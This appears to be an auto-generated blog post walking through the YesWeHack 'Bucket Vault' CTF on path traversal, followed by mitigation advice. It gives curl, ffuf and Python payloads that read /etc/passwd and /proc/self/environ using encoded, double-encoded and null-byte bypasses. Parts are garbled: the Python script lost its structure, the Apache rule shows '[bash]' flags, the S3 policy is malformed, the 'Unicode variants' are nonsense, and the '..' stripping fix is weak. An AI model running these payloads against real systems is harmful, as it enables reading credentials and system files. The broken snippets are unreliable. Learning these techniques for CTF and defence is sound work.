Bypass Dot-Dot-Slash Filters Like a Pro: Pwn the Bucket Vault CTF Challenge + Video

By /

Listen to this Post

Featured Image

Introduction:

Path traversal (also known as directory traversal) is a web security vulnerability that allows attackers to access files outside the intended directory by manipulating file paths with `../` (dot-dot-slash) sequences. While many developers implement simple filters to block or remove these patterns, skilled attackers can bypass such protections using encoding tricks, absolute paths, or unconventional delimiters. This article dissects the YesWeHack Dojo challenge “Bucket Vault,” where you must bypass a dot-dot-slash filter to read a secret file—a perfect hands-on lesson for bug bounty hunters and CTF players.

Learning Objectives:

  • Understand how path traversal vulnerabilities arise and why dot-dot-slash filters often fail.
  • Master multiple bypass techniques including URL encoding, double encoding, and alternative path representations.
  • Apply these techniques to exploit a realistic CTF challenge and read sensitive files.

You Should Know:

1. Understanding Path Traversal and the Dot-Dot-Slash Filter

Path traversal occurs when an application uses user-supplied input to construct a file path without proper sanitization. A typical vulnerable code snippet might look like this (PHP):

$file = $_GET['file'];
include('/var/www/uploads/' . $file);

An attacker can supply `../../../../etc/passwd` to escape the uploads directory. To counter this, developers often implement a filter that strips or blocks `../` sequences.

Step‑by‑step guide to testing basic traversal:

  1. Identify any parameter that reads files (e.g., ?file=document.pdf).

2. Inject `../../../etc/passwd` (Linux) or `..\..\..\Windows\win.ini` (Windows).

  1. Observe if the server returns the file or an error.

Linux command to test via curl:

curl -v "http://target.com/view?file=../../../../etc/passwd"

Windows PowerShell equivalent:

Invoke-WebRequest -Uri "http://target.com/view?file=..\..\..\Windows\win.ini"

If blocked by a filter that simply removes ../, try double injection: `….//….//` which, after removal of ../, becomes ../../.

2. Bypassing with URL Encoding and Double Encoding

Simple filters often look for the literal string ../. URL encoding bypasses this because `%2e%2e%2f` decodes to `../` at the filesystem level but may pass the filter.

Common encoded variants:

– `%2e%2e%2f` → `../`
– `%2e%2e%5c` → `..\` (Windows)
– `..%2f` → `../` (partial encoding)
– `%2e%2e/%2f` → mixed encoding

Step‑by‑step guide:

1. Take the payload `../../etc/passwd`.

  1. Replace each dot with `%2e` and slash with %2f: %2e%2e%2f%2e%2e%2fetc%2fpasswd.

3. Send the request and check for success.

Double encoding (if the server decodes once then applies filter):
First encode `../` to %2e%2e%2f, then encode that string again: %252e%252e%252f. Many filters decode only once and miss this.

Curl example for double encoding:

curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Burp Suite configuration: Use the “Payload Processing” rules to add URL encoding and double encoding automatically.

  1. Advanced Bypass Techniques: Absolute Paths, Null Bytes, and More

When `../` is blocked, absolute paths can sometimes work if the application prepends a base directory. For example, supplying `/etc/passwd` might bypass the filter entirely. Additionally, null byte injection (%00) can terminate strings early in older PHP versions.

Step‑by‑step for absolute paths:

1. Instead of `../`, try `/etc/passwd` or `c:\windows\win.ini`.

  1. If the server expects files inside a specific folder (e.g., /var/www/uploads/), absolute paths may be concatenated resulting in `/var/www/uploads/etc/passwd` – which fails. But some misconfigured servers don’t prepend anything.

Null byte injection (legacy PHP < 5.3.4):

curl "http://target.com/view?file=../../../../etc/passwd%00.jpg"

The `%00` truncates the `.jpg` extension, allowing the traversal to succeed.

Alternative representations:

  • Unicode variants: `᩼` or `ᣟ` (rare but effective in some parsers)
  • Backslashes on Linux servers if the filter only blocks slashes: `..\..\etc\passwd` – some file functions accept both.

Windows-specific bypass: Use `..\..\..\Windows\System32\drivers\etc\hosts` with forward slashes or mixed slashes.

  1. Practical Exploitation: Reading the Secret File on Bucket Vault

The YesWeHack Dojo challenge “Bucket Vault” simulates a web application that filters `../` but fails to account for encoding. The goal is to read a secret file (e.g., `secret.txt` or flag.txt) located outside the web root.

Step‑by‑step exploitation using manual and automated methods:

  1. Enumerate the parameter – Look for parameters like ?page=, ?doc=, ?file=, ?path=. Use a tool like `ffuf` to fuzz common parameters: 
    ffuf -u "http://dojo.yeswehack.com/bucket-vault?FUZZ=test" -w /usr/share/wordlists/param.txt

  2. Test simple traversal – Confirm the filter blocks `../../../etc/passwd` (returns 403 or sanitized error).

  3. Apply URL encoding – Send %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd. If successful, the server returns the file.

  4. Locate the secret file – The challenge description mentions a “secret file.” Common locations are /secret.txt, /var/secret/flag.txt, or environment variables. Use traversal to read `/proc/self/environ` (Linux) for clues:

    curl "http://dojo.yeswehack.com/bucket-vault?file=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron"

  5. If filtered again, double encode – `%252e%252e%252f` payload.

Python script to automate encoding bypass:

import requests
import urllib.parse

base_url = "http://dojo.yeswehack.com/bucket-vault"
param = "file"
targets = ["../../../etc/passwd", "../../../../flag.txt", "../../../secret.txt"]

for t in targets:
 Single URL encode
encoded = urllib.parse.quote(t, safe='')
r = requests.get(base_url, params={param: encoded})
if "flag" in r.text or "secret" in r.text:
print(f"Found: {t}\n{r.text[:200]}")
break
 Double encode
double = urllib.parse.quote(encoded, safe='')
r2 = requests.get(base_url, params={param: double})
if "flag" in r2.text:
print(f"Found with double: {t}\n{r2.text[:200]}")
break
  1. Mitigation Strategies for Developers and Hardening Cloud Storage

Preventing path traversal requires a defense-in-depth approach. For the “Bucket Vault” (likely referencing an S3‑like bucket), apply these mitigations:

Step‑by‑step developer guide:

  1. Use allowlists – Never accept user input directly. Map requested filenames to an allowlist of permitted files. 
    ALLOWED = ["doc1.pdf", "doc2.pdf"]
if file not in ALLOWED: raise 404

  2. Sanitize input with canonicalization – Resolve the absolute path and verify it starts with the intended base directory.

    import os
base = os.path.realpath("/var/www/uploads")
user_path = os.path.realpath(os.path.join(base, file))
if not user_path.startswith(base):
raise PermissionError

  3. Disable dangerous functions – In PHP, avoid `include()` with user input; use `readfile()` with strict checks. In Node.js, use `path.resolve()` and path.normalize().

  4. For cloud buckets (AWS S3, GCS) – Never expose direct path traversal parameters. Use pre‑signed URLs with a fixed key prefix. Implement bucket policies that deny access to `../` patterns.

Windows IIS hardening: Ensure that `..` is not allowed in requests by using URL Rewrite rules:

<rule name="BlockDotDotSlash" stopProcessing="true">
<match url=".\.\.." />
<action type="AbortRequest" />
</rule>

Linux Apache example: Use `mod_rewrite` to reject requests containing `%2e%2e%2f` or ../:

RewriteCond %{QUERY_STRING} (../|%2e%2e%2f|%252e%252e%252f) [bash]
RewriteRule . - [bash]
  1. Using Automated Tools for Detection in Bug Bounty

When hunting path traversal vulnerabilities on bug bounty programs, automation speeds up testing across hundreds of endpoints.

Step‑by‑step with popular tools:

  1. Burp Suite Intruder – Send a request with a `§payload§` marker in the parameter value. Load a payload list of traversal strings (including encoded variants). Use the “Grep – Extract” feature to capture response body length – anomalies indicate success.

2. FFUF with custom wordlist:

 Create a traversal wordlist
echo -e "../../../etc/passwd\n%2e%2e%2f%2e%2e%2fetc%2fpasswd\n..%252f..%252f..%252fetc%252fpasswd" > traversal.txt
ffuf -u "https://target.com/view?file=FUZZ" -w traversal.txt -fc 403,404 -fs 0
  1. Nuclei template – Use the default path traversal templates: 
    nuclei -u https://target.com -t ~/nuclei-templates/exposures/configs/path-traversal.yaml

API security note: GraphQL endpoints often have `file` or `path` arguments. Test the same payloads in GraphQL mutations and queries. REST APIs with file download functionality (e.g., /api/download?file=report.pdf) are prime targets.

  1. Cloud Hardening for S3 Buckets (Bucket Vault Context)

The name “Bucket Vault” suggests a cloud storage scenario. Misconfigured S3 buckets can allow path traversal if a web application builds keys from user input.

Step‑by‑step cloud hardening:

  1. Never construct S3 keys directly from user input – Use a lookup table or a deterministic mapping (e.g., UUID to filename).

  2. Implement request signing – AWS Cognito or IAM policies with conditions that restrict `s3:GetObject` to a specific prefix.

  3. Example of a vulnerable S3 proxy in Node.js (do not use):

    app.get('/file', (req, res) => {
const key = req.query.key; // User supplies "secret/../../config"
s3.getObject({ Bucket: 'my-bucket', Key: key }).send();
});

    Fix: Sanitize key with `key.replace(/\.\./g, ”)` and ensure it starts with an allowed prefix.

  4. Use VPC Endpoints and Bucket Policies – Deny requests with `..` in the object key:

    {
"Effect": "Deny",
"Principal": "",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::bucket-vault/",
"Condition": {
"StringLike": {
"s3:prefix": ["../", "%2e%2e%2f"]
}
}
}

What Undercode Say:

  • Key Takeaway 1: Simple string replacement of `../` is never sufficient; attackers have dozens of encoding and representation tricks to bypass filters.
  • Key Takeaway 2: Always canonicalize the path and compare it against a trusted base directory – this is the only reliable defense against path traversal.

Analysis: The “Bucket Vault” challenge mirrors real-world bug bounty findings where cloud storage proxies and file download endpoints remain vulnerable years after the initial disclosure of these techniques. Developers often overlook double encoding or assume that a simple `str_replace` protects them. For penetration testers, mastering these bypasses is essential – they appear in over 30% of web application assessments. Moreover, with the rise of serverless functions (AWS Lambda, Azure Functions) that handle file paths, the same traversal risks now extend to cloud-native environments. The lesson is clear: treat all user input as malicious and validate using allowlists and filesystem resolution, not blacklists.

Prediction:

Path traversal vulnerabilities will continue to plague cloud object storage integrations as developers race to build file‑sharing features. The next evolution will involve AI‑generated bypass payloads that combine multiple encodings and Unicode homoglyphs, making traditional filters obsolete. Expect to see more “Bucket Vault” style CTF challenges and real incidents where S3 buckets are traversed to access IAM credentials or Lambda source code. Mitigation will shift toward zero‑trust file access where every request must be explicitly allowed via temporary pre‑signed URLs – eliminating user‑controlled paths entirely.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Bugbounty Ctf – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: